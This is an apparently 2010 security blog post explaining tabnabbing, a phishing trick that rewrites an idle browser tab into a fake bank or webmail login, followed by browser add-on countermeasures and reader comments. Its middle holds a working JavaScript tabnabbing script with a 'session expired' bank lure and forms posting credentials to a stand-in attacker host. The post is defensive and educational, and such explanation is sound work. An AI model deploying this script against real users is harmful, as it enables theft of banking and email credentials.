Tabnabbing: Email & Online Banking Vulnerabilities and Countermeasures

In many of my posts I have pointed out the concept of "phishing" in email hacking, where the attacker sends the victim a fake/spoofed login page with a manipulated URL to create some sort of illusion. A few months back Aza Raskin, Creative Lead of Mozilla Firefox, described a new form of phishing attack called "tabnabbing" which manipulates the user's tab browsing.

What is Tabnabbing?

You can probably guess what it does from its name: a tab is one of the several pages open in the same browser window, and to nab is to seize something. In a tabnabbing attack the user has several tabs open; when he or she comes back to one of the earlier tabs after some time, its content, title and favicon have been changed to the login page of a webmail provider or a bank. By manipulating the tab, the attacker is really manipulating the victim's memory: if the user does not remember which website was open in that tab, he or she will log in to the fake page, thinking it was opened by him/her.

Check out the video to see the demo: "A New Type of Phishing Attack" by Aza Raskin on Vimeo.

How does it work?

The main concept is that the attacker puts JavaScript in the page's source code which waits for a certain delay (typically after detecting that the tab has lost focus) and then changes the page's favicon, title and content. It is more evil if the script is intelligent enough to detect which sites the user normally visits and then switch to a copy of one of those sites. The one thing the script cannot change is the address bar: the tab's URL remains the attacker's, which is the only reliable giveaway.

Why is online banking more vulnerable to this?

On online banking sites you will have noticed that if you log in and leave the page idle for a few minutes, you are automatically logged out. Because of this feature tabnabbing is very handy against online banking users: a tab that has turned into a bank login page with a "session expired" message looks exactly like what the user expects to see, so he or she assumes the session timed out and logs in again.
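The following is an added example, not code from the original post or from Aza Raskin's demo. It models the attacker-side script described in the two sections above: a page waits until the tab has been in the background for a while, picks a look-alike (a webmail login, or a bank login with the "session expired" pretext), and rewrites the title, favicon and body. The decision logic and the DOM mutation are written against a small document-like interface so they can be run outside a browser; the host names, icon URLs, form markup and the `knownHosts` input are all constructed for illustration and are hypothetical.

```javascript
// Added example: a minimal model of a tabnabbing page's script.
// Target templates, host names and URLs below are constructed for
// illustration (hypothetical), not taken from any real site.

// Look-alike pages the tab can be turned into. A real attacker would copy
// the victim site's markup; the bodies here are short placeholders.
const TARGETS = {
  'mail.example.com': {
    title: 'Sign in - Example Mail',
    favicon: 'https://attacker.invalid/icons/mail.ico',
    body: '<form action="https://attacker.invalid/steal" method="post">'
        + 'Email <input name="u"> Password <input name="p" type="password">'
        + '<button>Sign in</button></form>',
  },
  'bank.example.com': {
    // The "session expired" wording abuses the idle-logout habit of
    // banking sites described in the post.
    title: 'Example Bank - Your session has expired',
    favicon: 'https://attacker.invalid/icons/bank.ico',
    body: '<p>For your security you were logged out after 5 minutes of '
        + 'inactivity. Please log in again.</p>'
        + '<form action="https://attacker.invalid/steal" method="post">'
        + 'Customer ID <input name="u"> PIN <input name="p" type="password">'
        + '<button>Log in</button></form>',
  },
};

// Choose which look-alike to show. `knownHosts` stands in for whatever the
// attacker has inferred about the victim's browsing habits (hypothetical
// input). Falls back to the webmail template.
function chooseTarget(knownHosts) {
  for (const host of knownHosts) {
    if (TARGETS[host]) return TARGETS[host];
  }
  return TARGETS['mail.example.com'];
}

// Fire only once the tab has been out of focus for at least `delayMs`, so
// the victim has had time to forget what the tab originally was.
function shouldSwap(lostFocusAt, now, delayMs) {
  return lostFocusAt !== null && now - lostFocusAt >= delayMs;
}

// Rewrite title, favicon and body of a document-like object. Note what does
// NOT change: the location bar still shows the attacker's own URL.
function nabTab(doc, target) {
  doc.title = target.title;
  let icon = doc.querySelector('link[rel~="icon"]');
  if (!icon) {
    icon = doc.createElement('link');
    icon.rel = 'icon';
    doc.head.appendChild(icon);
  }
  icon.href = target.favicon;
  doc.body.innerHTML = target.body;
  return doc;
}

// Minimal stand-in for `document`, just enough for nabTab, so the logic can
// be exercised in Node (constructed for this example).
function fakeDocument() {
  const head = { children: [], appendChild(el) { this.children.push(el); } };
  return {
    title: 'Fun cat pictures',
    head,
    body: { innerHTML: '<p>cats</p>' },
    createElement(tag) { return { tagName: tag.toUpperCase() }; },
    querySelector(sel) {
      if (sel !== 'link[rel~="icon"]') return null;
      return head.children.find(el => el.tagName === 'LINK' && el.rel === 'icon') || null;
    },
  };
}

// Browser wiring: wait for the tab to lose focus, then swap after a delay.
// Skipped when there is no window/document (e.g. under Node).
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  const DELAY_MS = 5000;
  let lostFocusAt = null;
  window.addEventListener('blur', () => { lostFocusAt = Date.now(); });
  window.addEventListener('focus', () => { lostFocusAt = null; });
  setInterval(() => {
    if (shouldSwap(lostFocusAt, Date.now(), DELAY_MS)) {
      nabTab(document, chooseTarget(['bank.example.com']));
      lostFocusAt = null; // fire once
    }
  }, 1000);
}
```

Running `nabTab(fakeDocument(), chooseTarget(['bank.example.com']))` shows the three things the attacker can control (title, favicon, body) and, by omission, the one thing it cannot: the document's location. That is why the address bar, not the tab strip, is what to read before typing a password.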

I would recommend the Mozilla Firefox browser for web access because it has many security add-ons which are handy and easy to use:

1. WOT: marks websites with a colour rating and warns the user about bad ones.

2. NoScript: blocks JavaScript by default, and so stops the tabnabbing script itself along with XSS, malicious iframes and clickjacking.

3. Safe: makes SSL and extended validation (EV) SSL status more visible to the user.

4. Secure Login: lets you enable or disable JavaScript and works with Firefox's password manager. The password manager is a useful tabnabbing check in itself: it only fills credentials on the domain where they were saved, so if it declines to fill in a login page you expected it to know, look at the address bar before typing anything.

5. PhishTank SiteChecker: warns the user when a page is a known phish.

Beyond add-ons:

6. Close all other browser tabs and any web applications that use the browser cache before using online banking, and always read the address bar before entering a password: a nabbed tab can change its title, favicon and content, but not its URL.

7. You can also use a Linux Live CD to access the internet when using online banking.


If you found this post worth reading, do leave a comment; it will be appreciated.


7 comments:

Shabnam Sultan on July 20, 2010 at 7:43 PM said...

I will be more alert while accessing online banking.

I use FF. Do I still need to fear phishing attacks? :)

Satyajit Das(Admins) on July 21, 2010 at 4:58 PM said...

@Shabnam Actually, Mozilla Firefox is the safest browser due to the add-ons it has... but it does not make you hack-proof... your privacy can still be manipulated... but you can avoid that to some extent by staying vigilant while accessing the net... thanks for visiting... :)

Shekhar Sahu on July 23, 2010 at 7:01 PM said...

You are putting good effort into your blog. Please take my suggestion: without any loss of time, get a domain name soon.

Satyajit Das(Admins) on July 23, 2010 at 10:32 PM said...

@Shekhar Thanks for your suggestion... I was also thinking that... anyway, thanks for visiting... :)

sureshpeters on July 29, 2010 at 10:19 AM said...

Wow man, good info about tabnabbing! Thanks a lot.

Satyajit Das(Admins) on July 29, 2010 at 11:46 AM said...

Hey Suresh, thanks for visiting...

Ayush on September 24, 2010 at 9:42 PM said...

Great info, keep sharing...


© 2018 SecurityHunk All Rights Reserved and Template by Fresh Blogger Templates